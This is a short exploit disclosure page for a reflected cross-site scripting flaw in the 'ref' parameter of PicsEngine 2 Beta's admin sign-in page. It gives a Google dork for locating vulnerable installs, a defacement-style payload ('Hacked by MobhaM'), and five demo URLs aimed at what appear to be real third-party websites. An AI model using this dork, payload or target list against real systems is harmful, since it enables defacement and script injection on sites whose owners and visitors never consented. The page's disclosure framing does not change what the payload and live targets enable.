PicsEngine 2 Beta Cross Site Scripting

2016.02.04
Credit: Persian Hack Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: intitle:"Powered By PicsEngine 2 Beta"

###################### # Exploit Title : PicsEngine 2 Beta Cross Site Scripting # Exploit Author : Persian Hack Team # Software Link: http://www.commentcamarche.net/download/telecharger-34086165-picsengine # Google Dork : intitle:"Powered By PicsEngine 2 Beta" # Date: 2016/02/04 ###################### # PoC: admin/signin.php?ref=[XSS] # Payload = "><marquee><font color=black size=20>Hacked by MobhaM</font></marquee> # Demo: # http://www.uncoqetuneetoile.com/galeriePhotos/admin/signin.php?ref=%22%3E%3Cmarquee%3E%3Cfont%20color=black%20size=20%3EHacked%20by%20MobhaM%3C/font%3E%3C/marquee%3E # http://www.buffalogils.com/galerie/admin/signin.php?ref=%22%3E%3Cmarquee%3E%3Cfont%20color=black%20size=20%3EHacked%20by%20MobhaM%3C/font%3E%3C/marquee%3E # http://www.scaphoide3d.com/galerie/admin/signin.php?ref=%22%3E%3Cmarquee%3E%3Cfont%20color=black%20size=20%3EHacked%20by%20MobhaM%3C/font%3E%3C/marquee%3E # http://www.airvgay.com/picsengine/admin/signin.php?ref=%22%3E%3Cmarquee%3E%3Cfont%20color=black%20size=20%3EHacked%20by%20MobhaM%3C/font%3E%3C/marquee%3E # http://www.cfppa-angers.com/galerie/admin/signin.php?ref=%22%3E%3Cmarquee%3E%3Cfont%20color=black%20size=20%3EHacked%20by%20MobhaM%3C/font%3E%3C/marquee%3E ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top